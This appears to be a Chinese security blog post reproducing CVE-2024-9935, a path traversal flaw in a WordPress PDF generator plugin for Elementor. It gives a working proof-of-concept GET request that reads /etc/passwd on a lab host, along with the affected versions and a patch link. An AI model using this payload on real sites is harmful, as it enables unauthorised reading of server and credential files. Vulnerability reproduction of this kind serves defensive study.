正文

【成功复现】Wordpress Elementor Page Builder路径遍历漏洞(CVE-2024-9935)

admin
admin V管理员 /0 评论 /54 阅读
1216
此篇文章发布距今已超过25天,您需要注意文章的内容或图片是否可用!
..%

网安引领时代,弥天点亮未来   

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

WordPress plugin PDF Generator Addon for Elementor Page Builder 1.7.5版本及之前版本存在路径遍历漏洞,该漏洞源于包含一个路径遍历漏洞。

0x02影响版本
WordPress plugin PDF Generator Addon for Elementor Page Builder 1.7.5版本及之前版本

1.访问漏洞环境

2.对漏洞进行复现

 POC 

漏洞复现

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: 10.211.55.3

      测试,通过响应判断漏洞存在。

3.nuclei文件测试

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve



推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com